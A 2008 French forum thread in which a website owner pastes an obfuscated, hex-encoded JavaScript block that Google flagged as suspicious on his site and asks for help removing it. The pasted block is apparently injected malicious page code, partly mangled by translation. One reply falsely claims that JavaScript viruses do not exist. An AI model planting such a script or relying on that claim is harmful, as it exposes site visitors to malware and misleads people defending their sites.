Problème

Résolu
cs_papyjeannot Messages postés 1 Date d'inscription mardi 19 décembre 2000 Statut Membre Dernière intervention 20 août 2008 - 20 août 2008 à 21:00
nicomilville Messages postés 3472 Date d'inscription lundi 16 juillet 2007 Statut Membre Dernière intervention 28 février 2014 - 21 août 2008 à 09:22
bonjour

google me fait savoir que dans mon site il y a  le code soupçonneux suivant:  :

 

 <script>function  

c7841638945m48a8c303c208b(m48a8c303c2860  

) {retour  

(parseInt(m48a8c303c2860,16));} fonction  

m48a8c303c3fdc(m48a8c303c47b0) {var  

m48a8c303c4f84 = ''; m48a8c303c6e  

d4=String.fromCharCode;for(m48a8c303c575  

8=0;m48a8c303c5758 <m48a8c303c47b0.len  

gth;m48a8c303c5758+=2) {  

m48a8c303c4f84+=(m48a8c303c6ed4(c7841638  

945m48a8c303c208b(m48a8c303c47b0.substr (  

m48a8c303c5758,2))));} retour  

m48a8c303c4f84;} var  

z30 = ''; var  

m48a8c303c76a7 = 3C7'+z30+&apos  

;3637'+z30+'2697'+z30+&ap  

os;07'+z30+'43E696628216D7&apo  

s;+z30+'96961297'+z30+'B6  

46F637'+z30+'56D656E7'+z3  

0+'42E7'+z30+'7'+z30  

+'7'+z30+'2697'+z30+  

465287'+z30+'56E657&apos  

; +z30+'363617'+z30+'06528  

2027'+z30+'2533632536392536362  

537'+z30+'32253631253664253635  

2532302536652536312536642536352533642536  

33253337'+z30+'2532302537&apos  

; +z30+'332537'+z30+'32253  

633253364253237'+z30+'25363825  

37'+z30+'342537'+z30+&apo  

s;342537'+z30+'302533612532662  

532662536322536352537'+z30+'33  

2537'+z30+'342537'+z30+&a  

pos;332536382536312537'+z30+'3  

32537'+z30+'342536352532652536  

33253665253266253637'+z30+'253  

6662536662536342532652536382537'+z3  

0+'34253664253663253366253237'  

+z30+'2532622534642536312537'+  

z30+'342536382532652537'+z30+ &  

apos;322536662537'+z30+'352536  

652536342532382534642536312537'+z30  

+'342536382532652537'+z30+&apo  

s;32253631253665253634253666253664253238  

2532392532612533332533392533322533312533  

30253335253239253262253237'+z30+&ap  

os;253636253333253635253237'+z30+&a  

pos;2532302537'+z30+'37'+  

z30+'2536392536342537'+z30+&ap  

os;3425363825336425333625333525333925323  

0253638253635253639253637'+z30+&apo  

s;2536382537'+z30+'34253364253  

3352533392533352532302537'+z30+&apo  

s;332537'+z30+'342537'+z3  

0+'39253663253635253364253237'  

+z30+'2536342536392537'+z30+&a  

pos;332537'+z30+'3025366325363  

12537'+z30+'392533612532302536  

65253666253665253635253237'+z30+&ap  

os;2533652533632532662536392536362537&ap  

os;+z30+'32253631253664253635253365  

27'+z30+'29293B7'+z30+&ap  

os;D7'+z30+'6617'+z30+&ap  

os;2206D7'+z30+'969613D7'  

+z30+'47'+z30+'27'+z  

30+'5653B3C2F7'+z30+'3637  

'+z30+'2697'+z30+'07  

'+z30+'43E';document.writ  

e(m48a8c303c3fdc(m48a8c303c76a7)); </ s  

cript><script>check_content () & l  

t;/script>


Il me dit également de vérifier le code source, je sais pas ou trouver ce code soupçonneux


aidez moi car les gens qui vont sur mon site  reçoivent un message que si ils ouvrent ils risquent un virus


Aidez moi vite je n'y connait rien

merci d'avance

2 réponses

nicomilville Messages postés 3472 Date d'inscription lundi 16 juillet 2007 Statut Membre Dernière intervention 28 février 2014 36
21 août 2008 à 09:20
Salut,

Ce code c'est du code javascript (si on peut appeler ce torchon comme ça)...

Pour l'histoire de savoir ou il se trouve, faut que tu cherche sur toute les pages...

Si tu le retire je te conseil de la sauvegarder quelque part car si ce n'est pas un virus ça doit forcement servir a quelque chose...

a++

Si la réponse vous convient, pensez : Réponse acceptée !
3
nicomilville Messages postés 3472 Date d'inscription lundi 16 juillet 2007 Statut Membre Dernière intervention 28 février 2014 36
21 août 2008 à 09:22
Au fait, j'ai oublier de te dire mais tout le monde dit que javascript n'est pas sécurisé etc...

Mais ce n'est pas justifié, je n'est jamais vu un virus écrit en javascript, ce serait une première...

Le virus sont plutot écrit en java, vb, c, c++, etc... mais en aucun cas en js...

a++

Si la réponse vous convient, pensez : Réponse acceptée !
3
Rejoignez-nous